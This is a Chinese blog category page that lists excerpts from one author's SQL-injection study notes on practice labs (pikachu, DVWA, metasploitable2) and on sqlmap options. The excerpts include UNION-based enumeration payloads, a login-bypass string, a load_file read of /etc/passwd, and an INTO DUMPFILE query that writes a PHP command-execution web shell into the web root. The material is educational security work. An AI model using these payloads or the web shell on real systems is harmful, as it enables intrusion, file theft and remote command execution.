sql注入
文章平均质量分 71
sql注入
唐吉可黄
这个作者很懒,什么都没留下…
展开
-
sqlmap注入修改useragent信息
修改sqlmap.conf文件agent = Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0加载配置文件并执行测试python sqlmap.py -c sqlmap.conf -u我尝试去修改源码但是新版本就够变了就算了,还是用conf文件来加载吧...原创 2021-02-25 17:47:20 · 987 阅读 · 0 评论 -
sql注入-针对pikachu的注入实验的总结
采取手动注入的方式:联合注入可以成功的情况1+union+select+1,database() pikachu 10.4.14-mysql1+union+select+1,(select+table_name+from+information_schema.tables+where+table_schema='pikachu'+limit+0,1)httpinfo1+union+select+1,(select+table_name+from+information_schema.table原创 2021-01-23 13:49:06 · 240 阅读 · 0 评论 -
kali渗透学习-sqlmap自动注入(四)Enumeration,Brute force,UDF injection,File system,OS,Windows Registry,General类
Enumeration【数据枚举】–privileges -U username【CU 当前账号】-D dvwa -T users -C user --columns 【指定数据库,表,列】–exclude-sysdbs 【排除系统层的库】#查具体数据 【前提:当前数据库用户有权读取information_schema库】–schema --batch --exclude-sysdbs 元数据【–batch:批处理,使用默认选项,直接出结果】–count 【计数】Dump数据原创 2021-01-23 11:46:09 · 134 阅读 · 0 评论 -
kali渗透学习-sqlmap自动注入(三)Optimization,Injection,Detection,Techniques,Fingerprint类
Optimization【优化性能参数,可提高效率】-o:指定前三个参数(–predict-output、–keep-alive、–null-connection)–predict-output:根据检测方法,比岁返回值和统计表内容,不断缩小检测范围,提高检测效率可检测的返回值:版本名、用户名、密码、Privaleges、role、数据库名称、表名、列名与–threads参数不兼容统计表:/usr/share/sqlmap/txt/common-outputs.txt–keep-alive原创 2021-01-23 11:45:58 · 130 阅读 · 0 评论 -
kali渗透学习-sqlmap自动注入(二)Request类
Request可以利用谷歌查找此类回包网站#inurl:.php?id=1、 数据段:–dataGet/post都可以使用【POST方法】Sqlmap -u “http://1.1.1.1/a.php” --data=”user=1&pass=2” –f#sqlmap可自动识别“&”【GET方法】Sqlmap –u “http://1.1.1.1/a.php” –-data=”user=1&pass=2”2、 变量分隔符:–param-del#大部分we原创 2021-01-23 11:45:49 · 134 阅读 · 0 评论 -
metasploitable2在进行SQL注入时报错——Table ‘metasploit.accounts‘ doesn‘t exit
在使用metasploitable2进行SQL注入时,发现了如下的问题,Table 'metasploit.accounts' doesn't exit;首先进入数据库,查看库名;mysql -u root发现metasploit库是空的,这就是为什么前面会报错的原因;在数据库中,发现了一...原创 2021-01-23 11:45:25 · 150 阅读 · 0 评论 -
kali渗透学习-sqlmap自动注入(一)sqlmap介绍和TARGET类
sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞【动态页面中get/post参数、cookie、HTTP头】。它由Python语言开发而成,因此运行需要安装python环境。但在kali中已经集成。其功能完善,有强大的引擎,适用几乎所有数据库,,可自动进行数据榨取,也可对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行操作系统命令),还可以做XSS漏洞检测【Windows SQLmap教程】注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站原创 2021-01-23 11:45:37 · 468 阅读 · 1 评论 -
kali渗透学习-手动sql注入(三)猜测列名、表名、库名、字段内容,数据库写入,SQL盲注
当无权读取infomation_schema库【MySQL最重要的源数据库,必须有root权限】/拒绝union、order by语句,只有通过暴力猜测进一步的判断sql语句结构猜列名: ' and coclumn is null--+ (coclumn代表列名字,可以随便搞) 【并且列有一个字段为空,正常执行,若没有空字段,且该列存在,返回空白内容;若列不存在,则报错】(可确定语句可插入数据库运行)例如:’ and asd is null–+使用kali集成的字典文件爆破列名字对字典原创 2021-01-23 11:44:42 · 406 阅读 · 0 评论 -
kali渗透学习-手动sql注入(二)读取文件、写入文件、反弹shell
读取文件【使用load_file函数】’ union SELECT null,load_file(’/etc/passwd’)–(有一个空格)也可以使用burpsuite进行注入写入文件' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+ 【写入一句话木马;INTO DUMPLING:MySQL函数,将输入下载在数据库中】此语句往往会提示无法写入,因原创 2021-01-23 11:44:29 · 441 阅读 · 0 评论 -
kali渗透学习-手动sql注入检测(一)
SQL注入原理:通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。##服务端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器例如在用户登录判断SELECT * FROM users WHERE user=‘uname' AND password=‘pass‘SELECT * FROM users WHERE user=‘name' AND password='' OR ''='‘ 【OR:逻辑运算符,(p原创 2021-01-23 11:44:14 · 526 阅读 · 0 评论